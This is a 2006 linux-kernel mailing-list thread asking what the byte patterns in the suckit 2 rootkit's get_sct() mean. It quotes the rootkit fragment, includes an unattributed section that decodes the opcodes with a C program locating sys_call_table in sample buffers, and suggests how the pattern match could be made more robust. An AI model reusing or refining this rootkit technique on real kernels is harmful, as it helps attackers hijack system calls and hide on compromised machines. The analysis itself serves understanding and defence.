From: openbsd shen on 5 Apr 2006 21:40

This code is from get_sct() of suckit 2. Why is memmem() used with "\xc7\x44\x24\x18\xda\xff\xff\xff\xe8", and what does it want to find?

The get_sct() function:

    /* Fragment of suckit 2's get_sct() as posted: it walks the int 0x80
     * entry code to locate sys_call_table.  The helpers get_ep(), rkm(),
     * eprintf(), the constant SCLEN and the globals kernel_old80 and sc
     * are defined elsewhere in the kit and are not quoted here. */
    ulong get_sct()
    {
        uchar code[SCLEN+256];
        uchar *p, *pt;
        ulong r;
        uchar pt_off, pt_bit;
        int i;

        /* address of the int 0x80 handler */
        kernel_old80 = get_ep();
        if (!kernel_old80)
            return 0;
        /* read kernel memory starting 4 bytes before the handler */
        if (rkm(code, sizeof(code), kernel_old80-4) <= 0)
            return 0;
        /* bail out if the bytes in front of the handler read "PUNK" */
        if (!memcmp(code, "PUNK", 4))
            return 0;
        /* ff 14 85: the indirect call that dispatches through the table */
        p = (uchar *) memmem(code, SCLEN, "\xff\x14\x85", 3);
        if (!p)
            return 0;
        /* c7 44 24 18 da ff ff ff e8: movl/call pair, searched after the dispatch */
        pt = (uchar *) memmem(p+7, SCLEN-(p-code)-7,
                              "\xc7\x44\x24\x18\xda\xff\xff\xff\xe8", 9);
        /* when run to here, it always returns 0 */
        if (!pt) {
            /* %s on a NULL pointer is undefined; print the pointer value instead */
            eprintf("pt = %p\n", (void *) pt);
            return 0;
        }
        /* rel32 operand of the call, made absolute against the kernel address of pt */
        sc.trace = *((ulong *) (pt + 9));
        sc.trace += kernel_old80 + (pt - code) - 4 + 9 + 4;
        pt = (uchar *) memmem(p+7, SCLEN-(p-code)-7, "\xff\x14\x85", 3);
        if (!pt)
            return 0;
        /* f6 43 <off> <bit> 75: testb $bit,off(%ebx) followed by jne, before the dispatch */
        for (i = 0; i < (p-code); i++) {
            if ((code[i] == 0xf6) && (code[i+1] == 0x43) &&
                (code[i+4] == 0x75) && (code[i+2] < 127)) {
                pt_off = code[i+2];
                pt_bit = code[i+3];
                goto cc;   /* label cc: and the rest of the function are not quoted */
            }
        }
        return 0;
    }

-
To unsubscribe from this list: send the line "unsubscribe linux-kernel" in the body of a message to majordomo(a)vger.kernel.org
More majordomo info at http://vger.kernel.org/majordomo-info.html
Please read the FAQ at http://www.tux.org/lkml/
From: David Schwartz on 6 Apr 2006 09:40

> In what file did you find this? This is how back-doors are written!
>
> On Wed, 5 Apr 2006, openbsd shen wrote:
>
> > This code is from get_sct() of suckit 2. Why is memmem() used with
> > "\xc7\x44\x24\x18\xda\xff\xff\xff\xe8", and what does it want to find?
> > The get_sct() function:

As he said, it's from "suckit 2", a root kit. Back-doors in a root kit? Whodathunkit. ;)

DS
From: Jan Engelhardt on 8 Apr 2006 05:10

> Subject: What means "\xc7\x44\x24\x18\xda\xff\xff\xff\xe8"

Does not look like x86 asm code:

> p = (char *) memmem(code, SCLEN, "\xff\x14\x85", 3);

call dword ptr [edx-...]

> pt = (char *) memmem(p+7, SCLEN-(p-code)-7,
>                      "\xc7\x44\x24\x18\xda\xff\xff\xff\xe8", 9);

mov dword ptr [esp+0x18], 0xffffffda

Nope, does not look meaningful if taken as x86 asm.

Jan Engelhardt
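The two patterns decoded as x86 machine code, as an added example that is neither suckit's code nor anything posted in the thread: ff 14 85 disp32 is call *disp32(,%eax,4), the indirect call through sys_call_table with which the int 0x80 entry dispatches a system call, so the four bytes after it are the table's address; c7 44 24 18 da ff ff ff is movl $0xffffffda,0x18(%esp), which stores -ENOSYS (-38) into the saved %eax slot of pt_regs, and the e8 that follows is a call rel32, which in the 2.4-era entry.S tracesys path goes to syscall_trace. The program below runs get_sct()'s two searches and its address arithmetic over two constructed byte buffers (assumptions, not real kernel bytes): one shaped like the 2.4 path, where the movl is directly followed by the call, and one shaped like the 2.6 syscall_trace_entry path, where movl %esp,%eax and xorl %edx,%edx sit between them, so the 9-byte pattern never matches and the search returns 0, which is the behaviour the original poster reports. The load address 0xc0106f00 and the addresses embedded in the samples are made up.

```c
/* Added example (not suckit's code): decode the two byte patterns that
 * suckit 2's get_sct() searches for, against constructed sample buffers.
 * Build: cc -std=c99 -Wall -o sct_patterns sct_patterns.c
 */
#include <inttypes.h>
#include <stddef.h>
#include <stdint.h>
#include <stdio.h>
#include <string.h>

/* ff 14 85 <disp32>        call *disp32(,%eax,4)       dispatch via sys_call_table */
static const uint8_t PAT_DISPATCH[] = { 0xff, 0x14, 0x85 };
/* c7 44 24 18 da ff ff ff  movl $0xffffffda,0x18(%esp) $-ENOSYS into the saved %eax
 * e8 <rel32>               call rel32                  the syscall tracer          */
static const uint8_t PAT_TRACE[] = { 0xc7, 0x44, 0x24, 0x18, 0xda, 0xff, 0xff, 0xff, 0xe8 };

/* Portable replacement for the GNU memmem() the rootkit relies on. */
static const uint8_t *find_pattern(const uint8_t *buf, size_t len,
                                   const uint8_t *pat, size_t plen)
{
    if (plen == 0 || len < plen)
        return NULL;
    for (size_t i = 0; i + plen <= len; i++)
        if (memcmp(buf + i, pat, plen) == 0)
            return buf + i;
    return NULL;
}

static uint32_t le32(const uint8_t *p)
{
    return (uint32_t)p[0] | (uint32_t)p[1] << 8 | (uint32_t)p[2] << 16 | (uint32_t)p[3] << 24;
}

/* Address of sys_call_table: the disp32 operand of the dispatch call, or 0. */
uint32_t locate_sys_call_table(const uint8_t *code, size_t len)
{
    const uint8_t *p = find_pattern(code, len, PAT_DISPATCH, sizeof PAT_DISPATCH);
    if (!p || (size_t)(p - code) + 7 > len)
        return 0;
    return le32(p + 3);
}

/* Target of the call that directly follows movl $-ENOSYS,0x18(%esp), or 0.
 * As in get_sct(), the search starts after the dispatch call.  rel32 is
 * relative to the end of the 5-byte call, so
 *     target = base + (pt - code) + 8 (movl) + 5 (call) + rel32.
 * suckit writes the same sum as kernel_old80 + (pt - code) - 4 + 9 + 4,
 * because its buffer was read from 4 bytes before the int 0x80 handler. */
uint32_t locate_syscall_trace(const uint8_t *code, size_t len, uint32_t base)
{
    const uint8_t *p = find_pattern(code, len, PAT_DISPATCH, sizeof PAT_DISPATCH);
    if (!p || (size_t)(p - code) + 7 > len)
        return 0;
    size_t skip = (size_t)(p - code) + 7;
    const uint8_t *pt = find_pattern(code + skip, len - skip, PAT_TRACE, sizeof PAT_TRACE);
    if (!pt || (size_t)(pt - code) + 13 > len)
        return 0;
    uint32_t rel = le32(pt + 9);                 /* two's complement; unsigned wrap is the intended add */
    return base + (uint32_t)(pt - code) + 13 + rel;
}

/* Constructed sample (assumption, not real kernel bytes) read as if from
 * SAMPLE_BASE; shaped like the 2.4 tracesys path: movl then call. */
#define SAMPLE_BASE 0xc0106f00u
const uint8_t SAMPLE_24[] = {
    0x50,                                           /* push   %eax                    */
    0xfc,                                           /* cld                            */
    0x3d, 0x0a, 0x01, 0x00, 0x00,                   /* cmp    $0x10a,%eax             */
    0x73, 0x0d,                                     /* jae    +0xd  (to the movl)     */
    0xff, 0x14, 0x85, 0x00, 0x60, 0x2a, 0xc0,       /* call   *0xc02a6000(,%eax,4)    */
    0x89, 0x44, 0x24, 0x18,                         /* mov    %eax,0x18(%esp)         */
    0xeb, 0x0d,                                     /* jmp    +0xd  (over the tracer) */
    0xc7, 0x44, 0x24, 0x18, 0xda, 0xff, 0xff, 0xff, /* movl   $-ENOSYS,0x18(%esp)     */
    0xe8, 0xdd, 0x90, 0x00, 0x00,                   /* call   0xc0110000 (syscall_trace) */
    0x8b, 0x44, 0x24, 0x24,                         /* mov    0x24(%esp),%eax         */
    0xc3,                                           /* ret                            */
};

/* Same idea shaped like the 2.6 syscall_trace_entry path: two instructions
 * separate the movl from the call, so the 9-byte pattern cannot match. */
const uint8_t SAMPLE_26[] = {
    0xff, 0x14, 0x85, 0x00, 0x60, 0x2a, 0xc0,       /* call   *0xc02a6000(,%eax,4)    */
    0x89, 0x44, 0x24, 0x18,                         /* mov    %eax,0x18(%esp)         */
    0xc7, 0x44, 0x24, 0x18, 0xda, 0xff, 0xff, 0xff, /* movl   $-ENOSYS,0x18(%esp)     */
    0x89, 0xe0,                                     /* mov    %esp,%eax               */
    0x31, 0xd2,                                     /* xor    %edx,%edx               */
    0xe8, 0x00, 0x00, 0x00, 0x00,                   /* call   (rel32 irrelevant here) */
    0xc3,                                           /* ret                            */
};

int main(void)
{
    printf("2.4-shaped: sys_call_table=%#" PRIx32 " syscall_trace=%#" PRIx32 "\n",
           locate_sys_call_table(SAMPLE_24, sizeof SAMPLE_24),
           locate_syscall_trace(SAMPLE_24, sizeof SAMPLE_24, SAMPLE_BASE));
    printf("2.6-shaped: sys_call_table=%#" PRIx32 " syscall_trace=%#" PRIx32 " (no match)\n",
           locate_sys_call_table(SAMPLE_26, sizeof SAMPLE_26),
           locate_syscall_trace(SAMPLE_26, sizeof SAMPLE_26, SAMPLE_BASE));
    return 0;
}
```

The second search is the one the poster sees fail: the kit's pattern hard-codes the exact instruction sequence of one kernel generation, so a kernel whose entry code inserts anything between the movl and the call defeats it, even though both instructions are still there. Matching on the movl alone and then decoding forward instruction by instruction would be the robust version; get_sct() does not do that.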
From: Dan Sheppard on 10 Apr 2006 16:20

I can explain this, but I'll need a bit more convincing about your whitehated-ness.

I've been dabbling for a while with custom-kitting a honeypot machine with a kit which sits under suckit2 and event-logs it, to see what da kidz get up to on suckit'ed machines. Just curiosity, really, having come up against suckit a fair few times.

Dan.